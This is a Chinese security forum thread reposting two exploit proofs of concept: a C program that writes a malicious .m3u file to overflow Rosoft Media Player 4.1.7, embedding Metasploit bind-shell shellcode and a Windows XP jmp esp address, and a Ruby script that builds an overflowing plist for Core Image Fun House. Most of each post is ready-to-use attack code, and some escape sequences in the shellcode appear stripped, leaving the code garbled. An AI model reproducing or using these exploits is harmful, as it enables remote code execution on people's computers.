最近看过此主题的会员

返回列表 发帖

2013年了

2013年了
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:xiaomage发表,本帖发表者xiaomage符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者xiaomage和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。
为天下做安全

rosoft媒体播放4.1.7 .m3u堆栈溢出利用
/* rosoft-player-expl.c: 2007-12-18:** Copyright (c) 2007 devcode***          ^^ D E V C O D E ^^** Rosoft Media Player <= 4.1.7 .M3U Stack Overflow* [0-DAY]*** Description:*    A stack overflow occurs when parsing an .m3u file*    which does not contain any delimiters.** Hotfix/Patch:*    None.** Vulnerable systems:*    Rosoft Media Player <= 4.1.7** Tested on:*    Rosoft Media Player 4.1.7**    This is a PoC and was created for educational purposes only. The*    author is not held responsible if this PoC does not work or is*    used for any other purposes than the one stated above.** Notes:*    Nothing much here, except the player itself is a piece of shit.*    The vulnerability was found by Juan Pablo Lopez Yacubian*    (jplopezy_at_gmail.com). Come to think of it, the entire suite*    of products offered by Rosoft Engineering sucks bawls.**/#include <stdlib.h>#include <stdio.h>/*** Invalid chars: 0x1A 0xA 0xD 0x00* win32_bind -* EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub* http://metasploit.com*/unsigned char uszShellcode[] =    "x90x90x90x90x90x90x90x90"    "x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x60"    "x90xf0xf7x83xebxfcxe2xf4x9cxfax1bxbax88x69x0fx08"    "x9fxf0x7bx9bx44xb4x7bxb2x5cx1bx8cxf2x18x91x1fx7c"    "x2fx88x7bxa8x40x91x1bxbexebxa4x7bxf6x8exa1x30x6e"    "xccx14x30x83x67x51x3axfax61x52x1bx03x5bxc4xd4xdf"    "x15x75x7bxa8x44x91x1bx91xebx9cxbbx7cx3fx8cxf1x1c"    "x63xbcx7bx7ex0cxb4xecx96xa3xa1x2bx93xebxd3xc0x7c"    "x20x9cx7bx87x7cx3dx7bxb7x68xcex98x79x2ex9ex1cxa7"    "x9fx46x96xa4x06xf8xc3xc5x08xe7x83xc5x3fxc4x0fx27"    "x08x5bx1dx0bx5bxc0x0fx21x3fx19x15x91xe1x7dxf8xf5"    "x35xfaxf2x08xb0xf8x29xfex95x3dxa7x08xb6xc3xa3xa4"    "x33xc3xb3xa4x23xc3x0fx27x06xf8xe1xabx06xc3x79x16"    "xf5xf8x54xedx10x57xa7x08xb6xfaxe0xa6x35x6fx20x9f"    "xc4x3dxdex1ex37x6fx26xa4x35x6fx20x9fx85xd9x76xbe"    "x37x6fx26xa7x34xc4xa5x08xb0x03x98x10x19x56x89xa0"    "x9fx46xa5x08xb0xf6x9ax93x06xf8x93x9axe9x75x9axa7"    "x39xb9x3cx7ex87xfaxb4x7ex82xa1x30x04xcax6exb2xda"    "x9exd2xdcx64xedxeaxc8x5cxcbx3bx98x85x9ex23xe6x08"    "x15xd4x0fx21x3bxc7xa2xa6x31xc1x9axf6x31xc1xa5xa6"    "x9fx40x98x5axb9x95x3exa4x9fx46x9ax08x9fxa7x0fx27"    "xebxc7x0cx74xa4xf4x0fx21x32x6fx20x9fx8fx5ex10x97"    "x33x6fx26x08xb0x90xf0xf7";int main( int argc, char **argv ) {    FILE *f = NULL;    char *p = NULL;    printf( "
        Rosoft Media Player <= 4.1.7 .M3U Stack Overflow

" );    printf( "                Copyright (c) 2007 devcode


" );    if ( argc < 2 ) {        printf( "Usage: %s <file>
", argv[0] );        return -1;    }       f = fopen( argv[1], "w+" );    if ( !f ) {        printf( "[-] Unable to create m3u file.
" );        return -1;    }    p = (char *)malloc( 5000 );    memset( p, 0x41, 5000 );    /**     * We need a valid address here that contains     * a value of 0 and is writable, and of course,     * no 0x00s in the address itself. Try 0x1270FE0      * if 0x7FFDFFF0 doesn't work.     */    memcpy( p+4096, "xF0xFFxFDx7F", 4 );    /**     * Windows XP SP2 Pro - jmp esp (0x7C941EED, ntdll.dll)     */    memcpy( p+4104, "xEDx1Ex94x7C", 4 );    memcpy( p+4108, uszShellcode, sizeof( uszShellcode ) );    /**     * Cleanup     */    fputs( p, f );    fclose( f );    free( p );    printf( "
  • File generated succesfully!
    " );    return 0;}


















    公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    Core Image Fun House Arbitrary Code Execution PoC
    #!/usr/bin/ruby# Copyright (c) Netragard, LLC. adriel@netragard.com## /Developer/Applications/Graphics Tools/Core Image Fun House.app# /Contents/MacOS/Core Image Fun House## (gdb) x/10s 0xbfffddf7# 0xbfffddf7:      'Z' <repeats 101 times>, "DCBA center"## 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0):#        CFPropertyListCreateFromXMLData(): plist parse failed;#        the data is notproper UTF-8. The file name for this data#        could be:$#        /Users/test/Desktop/SuperTastey.funhouse/file.xml#        The parser will retry as in 10.2, but the problem should be#         corrected in the plist.##  x80-xFF range that do not form proper utf8len = 300fname = "SuperTastey"retaddr = 0x0d0d0d0d  # There are lots of filtered chars!if File.exist?(fname + ".funhouse/file.xml")    File.unlink(fname + ".funhouse/file.xml")    Dir.rmdir(fname + ".funhouse")endDir.mkdir(fname + ".funhouse")FUNSTUFF ="<?xml version="1.0" encoding="UTF-8"?>" +"<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN""http://www.apple.com/DTDs/PropertyList-1.0.dtd">" +"<plist version="1.0">" +"<dict>" +"<key>layers</key>" +"<array>" +"<dict>" +"<key>file</key>" +"<string>" +"Z" * len + [retaddr].pack("V") +"</string>" +"<key>offsetX</key>" +"<real>0.0</real>" +"<key>offsetY</key>" +"<real>0.0</real>" +"<key>type</key>" +"<string>image</string>" +"</dict>" +"<dict>" +"<key>classname</key>" +"<string>CIGlassDistortion</string>" +"<key>type</key>" +"<string>filter</string>" +"<key>values</key>" +"<dict>" +"<key>inputCenter_CIVectorValue</key>" +"<string>[150 150]</string>" +"<key>inputScale</key>" +"<real>200</real>" +"<key>inputTexture</key>" +"<string>" +"Z" * 50000 +"</string>" +"</dict>" +"</dict>" +"</array>" +"</dict>" +"</plist>" + "
    "target_file = File.open("SuperTastey.funhouse/file.xml", "w+") { |f|~  f.print(FUNSTUFF)  # weeeeee... lets have fun.~  f.close


















    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    呵呵 大家好奇嘛 来观看下~~~~  


















    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表